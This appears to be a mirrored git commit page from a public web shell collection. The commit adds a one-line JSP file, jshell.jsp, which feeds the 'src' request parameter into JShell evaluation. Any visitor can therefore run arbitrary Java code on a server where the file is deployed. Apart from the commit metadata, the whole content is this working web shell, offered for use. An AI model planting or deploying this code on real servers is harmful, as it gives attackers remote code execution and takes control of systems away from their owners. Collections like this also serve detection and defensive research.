mirror of
https://github.com/tennc/webshell
synced 2024-11-25 04:30:17 +00:00
Create jshell.jsp
This commit is contained in:
parent
c1112c2706
commit
294061690e
1 changed files with 1 additions and 0 deletions
1
jsp/p2j.cn/jshell.jsp
Normal file
1
jsp/p2j.cn/jshell.jsp
Normal file
|
@ -0,0 +1 @@
|
|||
<%=jdk.jshell.JShell.builder().build().eval(request.getParameter("src"))%>
|
Loading…
Reference in a new issue